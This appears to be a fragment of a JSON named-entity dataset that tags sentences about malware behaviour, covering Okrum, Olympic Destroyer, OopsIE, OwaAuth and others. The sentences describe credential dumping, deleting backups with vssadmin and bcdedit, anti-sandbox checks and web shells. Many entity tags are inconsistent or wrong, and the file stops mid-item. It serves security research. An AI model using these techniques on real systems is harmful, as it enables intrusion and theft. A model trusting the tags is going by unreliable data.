"to", "compress/decompress", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "was", "seen", "using", "modified", "Quarks", "PwDump", "to", "perform", "credential", "dumping." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "loader", "can", "decrypt", "the", "backdoor", "code,", "embedded", "within", "the", "loader", "or", "within", "a", "legitimate", "PNG", "file.", "A", "custom", "XOR", "cipher", "or", "RC4", "is", "used", "for", "decryption." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Data", "exfiltration", "is", "done", "by", "Okrum", "using", "the", "already", "opened", "channel", "with", "the", "C2", "server." ], "ner_tags": [ "O", "B-Purp", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "identify", "proxy", "servers", "configured", "and", "used", "by", "the", "victim,", "and", "use", "it", "to", "make", "HTTP", "requests", "to", "C2", "its", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "backdoor", "deletes", "files", "after", "they", "have", "been", "successfully", "uploaded", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "has", "used", "DriveLetterView", "to", "enumerate", "drive", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Before", "exfiltration,", "Okrum's", "backdoor", "has", "used", "hidden", "files", "to", "store", "logs", "and", "outputs", "from", "backdoor", "commands." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "has", "built-in", "commands", "for", "uploading,", "downloading,", "and", "executing", "files", "to", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Okrum", "was", "seen", "using", "a", "keylogger", "tool", "to", "capture", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Features", "B-Purp" ] }, { "tokens": [ "Okrum", "was", "seen", "using", "MimikatzLite", "to", "perform", "credential", "dumping." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "establish", "persistence", "by", "adding", "a", "new", "service", "NtmsSvc", "with", "the", "display", "name", "Removable", "Storage", "to", "masquerade", "as", "a", "legitimate", "Removable", "Storage", "Manager." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "mimics", "HTTP", "protocol", "for", "C2", "communication,", "while", "hiding", "the", "actual", "messages", "in", "the", "Cookie", "and", "Set-Cookie", "headers", "of", "the", "HTTP", "requests." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "establishes", "persistence", "by", "creating", "a", ".lnk", "shortcut", "to", "itself", "in", "the", "Startup", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "installer", "can", "attempt", "to", "achieve", "persistence", "by", "creating", "a", "scheduled", "task." ], "ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "loader", "can", "create", "a", "new", "service", "named", "NtmsSvc", "to", "execute", "the", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "establish", "persistence", "by", "creating", "a", ".lnk", "shortcut", "to", "itself", "in", "the", "Startup", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "has", "used", "base64", "to", "encode", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "payload", "is", "encrypted", "and", "embedded", "within", "its", "loader,", "or", "within", "a", "legitimate", "PNG", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile" ] }, { "tokens": [ "Okrum", "uses", "AES", "to", "encrypt", "network", "traffic.", "The", "key", "can", "be", "hardcoded", "or", "negotiated", "with", "the", "C2", "server", "in", "the", "registration", "phase." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "loader", "can", "check", "the", "amount", "of", "physical", "memory", "and", "terminates", "itself", "if", "the", "host", "has", "less", "than", "1.5", "Gigabytes", "of", "physical", "memory", "in", "total." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "collect", "computer", "name,", "locale", "information,", "and", "information", "about", "the", "OS", "and", "architecture." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "collect", "network", "information,", "including", "the", "host", "IP", "address,", "DNS,", "and", "proxy", "information." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "was", "seen", "using", "NetSess", "to", "discover", "NetBIOS", "sessions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "collect", "the", "victim", "username." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "obtain", "the", "date", "and", "time", "of", "the", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "loader", "can", "detect", "presence", "of", "an", "emulator", "by", "using", "two", "calls", "to", "GetTickCount", "API,", "and", "checking", "whether", "the", "time", "has", "been", "accelerated." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "can", "impersonate", "a", "logged-on", "user's", "security", "context", "using", "a", "call", "to", "the", "ImpersonateLoggedOnUser", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Okrum", "loader", "only", "executes", "the", "payload", "after", "the", "left", "mouse", "button", "has", "been", "pressed", "at", "least", "three", "times,", "in", "order", "to", "avoid", "being", "executed", "within", "virtualized", "or", "emulated", "environments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum", "uses", "HTTP", "for", "communication", "with", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Okrum's", "backdoor", "has", "used", "cmd.exe", "to", "execute", "arbitrary", "commands", "as", "well", "as", "batch", "scripts", "to", "update", "itself", "to", "a", "newer", "version." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "establish", "persistence,", "Okrum", "can", "install", "itself", "as", "a", "new", "service", "named", "NtmSsvc." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Olympic", "Destroyer", "will", "attempt", "to", "clear", "the", "System", "and", "Security", "event", "logs", "using", "<code>wevtutil</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "contains", "a", "module", "that", "tries", "to", "obtain", "stored", "credentials", "from", "web", "browsers." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "overwrites", "files", "locally", "and", "on", "remote", "shares." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "uses", "the", "native", "Windows", "utilities", "<code>vssadmin</code>,", "<code>wbadmin</code>,", "and", "<code>bcdedit</code>", "to", "delete", "and", "disable", "operating", "system", "recovery", "features", "such", "as", "the", "Windows", "backup", "catalog", "and", "Windows", "Automatic", "Repair." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "contains", "a", "module", "that", "tries", "to", "obtain", "credentials", "from", "LSASS,", "similar", "to", "Mimikatz.", "These", "credentials", "are", "used", "with", "PsExec", "and", "Windows", "Management", "Instrumentation", "to", "help", "the", "malware", "propagate", "itself", "across", "a", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "attempts", "to", "copy", "itself", "to", "remote", "machines", "on", "the", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "will", "attempt", "to", "enumerate", "mapped", "network", "shares", "to", "later", "attempt", "to", "wipe", "all", "files", "on", "those", "shares." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "uses", "Windows", "Management", "Instrumentation", "to", "enumerate", "all", "systems", "in", "the", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "uses", "PsExec", "to", "interact", "with", "the", "<code>ADMIN$</code>", "network", "share", "to", "execute", "commands", "on", "remote", "systems." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "utilizes", "PsExec", "to", "help", "propagate", "itself", "across", "a", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "uses", "the", "API", "call", "<code>ChangeServiceConfigW</code>", "to", "disable", "all", "services", "on", "the", "affected", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "uses", "API", "calls", "to", "enumerate", "the", "infected", "system's", "ARP", "table." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "will", "shut", "down", "the", "compromised", "system", "after", "it", "is", "done", "modifying", "system", "configuration", "settings." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Olympic", "Destroyer", "uses", "WMI", "to", "help", "propagate", "itself", "across", "a", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OnionDuke", "can", "use", "a", "custom", "decryption", "algorithm", "to", "decrypt", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Features", "O" ] }, { "tokens": [ "OnionDuke", "has", "the", "capability", "to", "use", "a", "Denial", "of", "Service", "module." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "OnionDuke", "steals", "credentials", "from", "its", "victims." ], "ner_tags": [ "B-Way", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "OnionDuke", "uses", "Twitter", "as", "a", "backup", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "OnionDuke", "uses", "HTTP", "and", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "OopsIE", "compresses", "collected", "files", "with", "a", "simple", "character", "replacement", "scheme", "before", "sending", "them", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "compresses", "collected", "files", "with", "GZipStream", "before", "sending", "them", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "exfiltrates", "command", "output", "and", "collected", "files", "to", "its", "C2", "server", "in", "1500-byte", "blocks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "concatenates", "then", "decompresses", "multiple", "resources", "to", "load", "an", "embedded", ".Net", "Framework", "assembly." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "can", "upload", "files", "from", "the", "victim's", "machine", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "has", "the", "capability", "to", "delete", "files", "and", "scripts", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "can", "download", "files", "from", "its", "C2", "server", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "stages", "the", "output", "from", "command", "execution", "and", "collected", "files", "in", "specific", "folders", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "uses", "the", "Confuser", "protector", "to", "obfuscate", "an", "embedded", ".Net", "Framework", "assembly", "used", "for", "C2.", "OopsIE", "also", "encodes", "collected", "data", "in", "hexadecimal", "format", "before", "writing", "to", "files", "on", "disk", "and", "obfuscates", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "creates", "a", "scheduled", "task", "to", "run", "itself", "every", "three", "minutes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "uses", "the", "SmartAssembly", "obfuscator", "to", "pack", "an", "embedded", ".Net", "Framework", "assembly", "used", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "encodes", "data", "in", "hexadecimal", "format", "over", "the", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "performs", "several", "anti-VM", "and", "sandbox", "checks", "on", "the", "victim's", "machine.", "One", "technique", "the", "group", "has", "used", "was", "to", "perform", "a", "WMI", "query", "<code>SELECT", "*", "FROM", "MSAcpi_ThermalZoneTemperature</code>", "to", "check", "the", "temperature", "to", "see", "if", "it’s", "running", "in", "a", "virtual", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "checks", "for", "information", "on", "the", "CPU", "fan,", "temperature,", "mouse,", "hard", "disk,", "and", "motherboard", "as", "part", "of", "its", "anti-VM", "checks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "checks", "to", "see", "if", "the", "system", "is", "configured", "with", "\"Daylight\"", "time", "and", "checks", "for", "a", "specific", "region", "to", "be", "set", "for", "the", "timezone." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "creates", "and", "uses", "a", "VBScript", "as", "part", "of", "its", "persistent", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "uses", "the", "command", "prompt", "to", "execute", "commands", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OopsIE", "uses", "WMI", "to", "perform", "discovery", "techniques." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Orz", "has", "used", "Technet", "and", "Pastebin", "web", "pages", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Orz", "can", "gather", "victim", "drive", "information." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Orz", "can", "overwrite", "Registry", "settings", "to", "reduce", "its", "visibility", "on", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Orz", "can", "download", "files", "onto", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Orz", "can", "perform", "Registry", "operations." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Orz", "strings", "are", "base64", "encoded,", "such", "as", "the", "embedded", "DLL", "known", "as", "MockDll." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Orz", "can", "gather", "a", "process", "list", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Some", "Orz", "versions", "have", "an", "embedded", "DLL", "known", "as", "MockDll", "that", "uses", "process", "hollowing", "and", "Regsvr32", "to", "execute", "another", "payload." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Orz", "versions", "have", "an", "embedded", "DLL", "known", "as", "MockDll", "that", "uses", "Process", "Hollowing", "and", "regsvr32", "to", "execute", "another", "payload." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Orz", "can", "gather", "the", "victim's", "Internet", "Explorer", "version." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Orz", "can", "gather", "the", "victim", "OS", "version", "and", "whether", "it", "is", "64", "or", "32", "bit." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Orz", "can", "gather", "victim", "proxy", "information." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Orz", "can", "execute", "shell", "commands.", "Orz", "can", "execute", "commands", "with", "JavaScript." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Out1", "can", "copy", "files", "and", "Registry", "data", "from", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Out1", "can", "parse", "e-mails", "on", "a", "target", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Out1", "has", "the", "ability", "to", "encode", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Out1", "can", "use", "HTTP", "and", "HTTPS", "in", "communications", "with", "remote", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Out1", "can", "use", "native", "command", "line", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "can", "automatically", "scan", "for", "and", "collect", "files", "with", "specific", "extensions." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "can", "automatically", "upload", "collected", "files", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "can", "collect", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "can", "upload", "files", "from", "a", "compromised", "host", "over", "its", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "can", "delete", "itself", "following", "the", "successful", "execution", "of", "a", "follow-on", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "can", "search", "for", "specific", "file", "extensions,", "including", "zipped", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Way", "B-Features" ] }, { "tokens": [ "OutSteel", "can", "download", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "has", "relied", "on", "a", "user", "to", "execute", "a", "malicious", "attachment", "delivered", "via", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "OutSteel", "has", "relied", "on", "a", "user", "to", "click", "a", "malicious", "link", "within", "a", "spearphishing", "email." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "OutSteel", "can", "identify", "running", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "has", "been", "distributed", "as", "a", "malicious", "attachment", "within", "a", "spearphishing", "email." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "OutSteel", "has", "been", "distributed", "through", "malicious", "links", "contained", "within", "spearphishing", "emails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "OutSteel", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "OutSteel", "has", "used", "`cmd.exe`", "to", "scan", "a", "compromised", "host", "for", "specific", "file", "extensions." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OwaAuth", "DES-encrypts", "captured", "credentials", "using", "the", "key", "12345678", "before", "writing", "the", "credentials", "to", "a", "log", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OwaAuth", "has", "a", "command", "to", "list", "its", "directory", "and", "logical", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "OwaAuth", "has", "been", "loaded", "onto", "Exchange", "servers", "and", "disguised", "as", "an", "ISAPI", "filter", "(owaauth.dll).", "The", "IIS", "w3wp.exe", "process", "then", "loads", "the", "malicious", "DLL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OwaAuth", "captures", "and", "DES-encrypts", "credentials", "before", "writing", "the", "username", "and", "password", "to", "a", "log", "file,", "<code>C:\\log.txt</code>." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "OwaAuth", "uses", "the", "filename", "owaauth.dll,", "which", "is", "a", "legitimate", "file", "that", "normally", "resides", "in", "<code>%ProgramFiles%\\Microsoft\\Exchange", "Server\\ClientAccess\\Owa\\Auth\\</code>;", "the", "malicious", "file", "by", "the", "same", "name", "is", "saved", "in", "<code>%ProgramFiles%\\Microsoft\\Exchange", "Server\\ClientAccess\\Owa\\bin\\</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "OwaAuth", "has", "a", "command", "to", "timestop", "a", "file", "or", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OwaAuth", "uses", "incoming", "HTTP", "requests", "with", "a", "username", "keyword", "and", "commands", "and", "handles", "them", "as", "instructions", "to", "perform", "actions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OwaAuth", "is", "a", "Web", "shell", "that", "appears", "to", "be", "exclusively", "used", "by", "Threat", "Group-3390.", "It", "is", "installed", "as", "an", "ISAPI", "filter", "on", "Exchange", "servers", "and", "shares", "characteristics", "with", "the", "China", "Chopper", "Web", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "has", "the", "ability", "to", "create", "reverse", "shells", "with", "Perl", "scripts." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "P.A.S.", "Webshell", "has", "the", "ability", "to", "list", "and", "extract", "data", "from", "SQL", "databases." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", 